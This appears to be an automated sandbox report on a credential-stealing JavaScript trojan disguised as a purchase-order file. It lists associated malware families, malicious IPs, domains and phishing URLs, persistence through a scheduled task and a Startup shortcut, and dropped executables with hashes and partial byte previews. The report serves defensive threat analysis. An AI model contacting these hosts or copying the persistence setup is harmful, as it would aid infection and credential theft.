                                      Sample name:RFQ -PO.20571-0001-QBMS-PRQ-0200140.js
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.expl.evad.winJS@48/18@3/3
                                      EGA Information:
                                      • Successful, ratio: 90%
                                      HCA Information:
                                      • Successful, ratio: 95%
                                      • Number of executed functions: 55
                                      • Number of non-executed functions: 302
                                      Cookbook Comments:
                                      • Found application associated with file extension: .js

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target server_BTC.exe, PID 6832 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • VT rate limit hit for: RFQ -PO.20571-0001-QBMS-PRQ-0200140.js

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      03:21:43API Interceptor19x Sleep call for process: powershell.exe modified
                                      03:21:43API Interceptor812142x Sleep call for process: neworigin.exe modified
                                      03:21:45API Interceptor265971x Sleep call for process: TrojanAIbot.exe modified
                                      03:21:58API Interceptor23x Sleep call for process: build.exe modified
                                      09:21:44Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                      09:21:46AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      104.26.13.205SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousUnknownBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousUnknownBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                      • api.ipify.org/
                                      fptlVDDPkS.dllGet hashmaliciousQuasarBrowse
                                      • api.ipify.org/
                                      vstdlib_s64.dll.dllGet hashmaliciousQuasarBrowse
                                      • api.ipify.org/
                                      51.195.88.199ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                        RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                          ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                            NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXEGet hashmaliciousAgentTesla, RedLineBrowse
                                              Order SMG 201906 20190816orderGMD#0498366Deta.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                RFQPO3D93876738.scr.exeGet hashmaliciousAgentTesla, RedLine, XWormBrowse
                                                  ORDERDATASHEET#PO8738763.scr.exeGet hashmaliciousAgentTesla, RedLine, SugarDump, XWormBrowse
                                                    Request for Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                      Revised_June_Order_Document#po839203.jsGet hashmaliciousAgentTesla, SugarDump, XWormBrowse
                                                        212.162.149.53RFQ_PO-WDX73892970.vbsGet hashmaliciousRedLineBrowse
                                                          RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                            NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXEGet hashmaliciousAgentTesla, RedLineBrowse
                                                              yB576bM3Ll.exeGet hashmaliciousRedLineBrowse

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                s82.gocheapweb.comORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                • 51.195.88.199
                                                                RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                • 51.195.88.199
                                                                ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                • 51.195.88.199
                                                                NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXEGet hashmaliciousAgentTesla, RedLineBrowse
                                                                • 51.195.88.199
                                                                Order SMG 201906 20190816orderGMD#0498366Deta.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                                • 51.195.88.199
                                                                RFQPO3D93876738.scr.exeGet hashmaliciousAgentTesla, RedLine, XWormBrowse
                                                                • 51.195.88.199
                                                                ORDERDATASHEET#PO8738763.scr.exeGet hashmaliciousAgentTesla, RedLine, SugarDump, XWormBrowse
                                                                • 51.195.88.199
                                                                Request for Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                                • 51.195.88.199
                                                                Revised_June_Order_Document#po839203.jsGet hashmaliciousAgentTesla, SugarDump, XWormBrowse
                                                                • 51.195.88.199
                                                                RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                • 141.95.47.215
                                                                api.ipify.orgTelco 32pcs New Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.12.205
                                                                https://lmoriw-iekascma-oqmmcq-213-cmakwe-fgacsax.pages.dev/robots.txt/Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.26.13.205
                                                                INDIA - VSL PARTICULARS.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.12.205
                                                                http://limeac-oawkcc-otmsesrt-iond0-minestoasli.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                • 172.67.74.152
                                                                https://dreativityblocksnodes.pages.dev/Get hashmaliciousUnknownBrowse
                                                                • 172.67.74.152
                                                                https://check-smulti-993054.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                • 172.67.74.152
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 104.26.12.205
                                                                SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                                                                • 104.26.13.205
                                                                SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                                                                • 104.26.12.205
                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                • 172.67.74.152
                                                                pywolwnvd.bizORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                • 54.244.188.177
                                                                RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                • 54.244.188.177
                                                                ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                • 54.244.188.177
                                                                TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                • 54.244.188.177
                                                                NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXEGet hashmaliciousAgentTesla, RedLineBrowse
                                                                • 54.244.188.177
                                                                TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBook, LummaC StealerBrowse
                                                                • 54.244.188.177
                                                                Original Shipment Document_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                • 54.244.188.177
                                                                Payment Advice - Advice RefGLV626201911]Priority payment Customer_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                • 54.244.188.177
                                                                Quotation.exeGet hashmaliciousRemcosBrowse
                                                                • 54.244.188.177
                                                                Bank Form.scr.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                • 54.244.188.177

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                UNREAL-SERVERSUS1DUCJGrpyb.exeGet hashmaliciousRemcosBrowse
                                                                • 204.10.160.136
                                                                C8G355qROx.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                • 204.10.160.136
                                                                TT4729920DBO.xlsGet hashmaliciousRemcosBrowse
                                                                • 204.10.160.136
                                                                RFQ_PO-WDX73892970.vbsGet hashmaliciousRedLineBrowse
                                                                • 212.162.149.53
                                                                RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                • 212.162.149.53
                                                                KZ710-0038.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 162.251.122.106
                                                                SKMBT88122024816310TD01202817311 .vbsGet hashmaliciousRemcosBrowse
                                                                • 212.162.149.163
                                                                SKMBT_77122024816310TD01_20220128_17311 .vbsGet hashmaliciousRemcosBrowse
                                                                • 212.162.149.163
                                                                RFQASTM36QTY1000MTOrder.exeGet hashmaliciousRedLineBrowse
                                                                • 204.10.160.212
                                                                Z0055 Zhixing Construction Engineering Pte. Ltd..exeGet hashmaliciousRedLineBrowse
                                                                • 212.162.149.159
                                                                CLOUDFLARENETUSQUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                450230549.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 162.159.134.233
                                                                64.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.61.3
                                                                450230549.exeGet hashmaliciousUnknownBrowse
                                                                • 162.159.134.233
                                                                PO-100001499.exeGet hashmaliciousFormBookBrowse
                                                                • 188.114.96.3
                                                                ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.64.108
                                                                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                https://qwehikd-asdu.xyz/Get hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                https://geminishdw-dws.top/Get hashmaliciousUnknownBrowse
                                                                • 188.114.97.3
                                                                OVHFRhttps://docs-i-trezor.github.io/en-us/Get hashmaliciousHTMLPhisherBrowse
                                                                • 46.105.222.162
                                                                https://is.gd/fxcRirGet hashmaliciousUnknownBrowse
                                                                • 51.77.64.70
                                                                https://cancelar-plan-pr0teccion1.w3spaces.com/Get hashmaliciousUnknownBrowse
                                                                • 54.38.113.6
                                                                https://telstra-104752.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                • 51.89.9.254
                                                                https://pancakes.multiinx.com/Get hashmaliciousUnknownBrowse
                                                                • 147.135.222.233
                                                                https://simplescalingdefender.pages.dev/Get hashmaliciousUnknownBrowse
                                                                • 54.38.113.3
                                                                http://rewardsforyoutoclaim.pages.dev/Get hashmaliciousUnknownBrowse
                                                                • 51.89.9.252
                                                                http://rewards-tokss-foryou.pages.dev/Get hashmaliciousUnknownBrowse
                                                                • 5.135.209.104
                                                                https://fastsoluudapppmigratee.com/Get hashmaliciousUnknownBrowse
                                                                • 178.32.197.53
                                                                https://sucursal-virtual03.w3spaces.com/Get hashmaliciousUnknownBrowse
                                                                • 54.38.113.2

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                3b5074b1b5d032e5620f69f9f700ff0eQUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 104.26.13.205
                                                                450230549.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.13.205
                                                                450230549.exeGet hashmaliciousUnknownBrowse
                                                                • 104.26.13.205
                                                                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 104.26.13.205
                                                                https://geminiqwc-sw.top/Get hashmaliciousUnknownBrowse
                                                                • 104.26.13.205
                                                                http://tiktok1688.cc/Get hashmaliciousUnknownBrowse
                                                                • 104.26.13.205
                                                                https://qwekorqw-eqo.top/Get hashmaliciousUnknownBrowse
                                                                • 104.26.13.205
                                                                https://qwoms-dei3.top/Get hashmaliciousUnknownBrowse
                                                                • 104.26.13.205
                                                                http://cmn.pkgu192.vip/Get hashmaliciousUnknownBrowse
                                                                • 104.26.13.205
                                                                http://frt.asan192.vip/Get hashmaliciousUnknownBrowse
                                                                • 104.26.13.205

                                                                Dropped Files

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Users\user\AppData\Local\Temp\build.exeRFQ_PO-WDX73892970.vbsGet hashmaliciousRedLineBrowse
                                                                  RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                    NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXEGet hashmaliciousAgentTesla, RedLineBrowse
                                                                      C:\Users\user\AppData\Local\Temp\neworigin.exeORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                        RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                          ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                            NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXEGet hashmaliciousAgentTesla, RedLineBrowse
                                                                              Order SMG 201906 20190816orderGMD#0498366Deta.exeGet hashmaliciousAgentTesla, RedLineBrowse

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAIbot.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):410
                                                                                Entropy (8bit):5.361827289088002
                                                                                Encrypted:false
                                                                                SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                Malicious:false
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\build.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\build.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):3094
                                                                                Entropy (8bit):5.33145931749415
                                                                                Encrypted:false
                                                                                SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                                                                                MD5:3FD5C0634443FB2EF2796B9636159CB6
                                                                                SHA1:366DDE94AEFCFFFAB8E03AD8B448E05D7489EB48
                                                                                SHA-256:58307E94C67E2348F5A838DE4FF668983B38B7E9A3B1D61535D3A392814A57D6
                                                                                SHA-512:8535E7C0777C6B0876936D84BDE2BDC59963CF0954D4E50D65808E6E806E8B131DF5DB8FA0E030FAE2702143A7C3A70698A2B9A80519C9E2FFC286A71F0B797C
                                                                                Malicious:false
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\server_BTC.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):410
                                                                                Entropy (8bit):5.361827289088002
                                                                                Encrypted:false
                                                                                SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                Malicious:false
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):2220
                                                                                Entropy (8bit):5.379753225343802
                                                                                Encrypted:false
                                                                                SSDEEP:48:eWSU4xympjgs4Rc9tEoUl8NPryHl7u1iMugeC/ZM0Uyu+d:eLHxvCsIcnSKjyFOugw1K
                                                                                MD5:46EC557BA396F88FA6818DC45FB86905
                                                                                SHA1:8DF141A36E6CDD6FA71C23887D04BC14BDF220D1
                                                                                SHA-256:5DEF590FCF190165C09781C3E6EF72B697EE7BC4909D7ACBB6273262FD28AEA3
                                                                                SHA-512:0368E155D4CDEF49EED80160E2CC1DE5688A914EB54A478E30DEEA2F8A3B53FFD86762583F316193393D3F80F926CB20277C6BB53D4C34D01CA692F17DE53581
                                                                                Malicious:false
                                                                                Preview:@...e................................................@..........P................1]...E.....i.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............V.}...@...i...........System.Transactions.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b11kihth.5ta.ps1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jd1lijec.d5l.psm1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lds3gji3.elb.ps1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xxg3ntfa.rlf.psm1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\build.exe

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\svchost.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):307712
                                                                                Entropy (8bit):5.081289674980977
                                                                                Encrypted:false
                                                                                SSDEEP:3072:acZqf7D34Tp/0+mA0kywMlQEg85fB1fA0PuTVAtkxzZ3RMeqiOL2bBOA:acZqf7DItnGCQNB1fA0GTV8kv0L
                                                                                MD5:3B6501FEEF6196F24163313A9F27DBFD
                                                                                SHA1:20D60478D3C161C3CACB870AAC06BE1B43719228
                                                                                SHA-256:0576191C50A1B6AFBCAA5CB0512DF5B6A8B9BEF9739E5308F8E2E965BF9B0FC5
                                                                                SHA-512:338E2C450A0B1C5DFEA3CD3662051CE231A53388BC2A6097347F14D3A59257CE3734D934DB1992676882B5F4F6A102C7E15B142434575B8970658B4833D23676
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                Joe Sandbox View:
                                                                                • Filename: RFQ_PO-WDX73892970.vbs, Detection: malicious, Browse
                                                                                • Filename: RFQ_PO_KMM7983972_ORDER_DETAILS.js, Detection: malicious, Browse
                                                                                • Filename: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE, Detection: malicious, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................<...O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................p.......H....... ...............(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.

                                                                                C:\Users\user\AppData\Local\Temp\neworigin.exe

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\svchost.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):250368
                                                                                Entropy (8bit):5.008874766930935
                                                                                Encrypted:false
                                                                                SSDEEP:3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
                                                                                MD5:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                SHA1:392D68C000137B8039155DF6BB331D643909E7E7
                                                                                SHA-256:DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
                                                                                SHA-512:9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
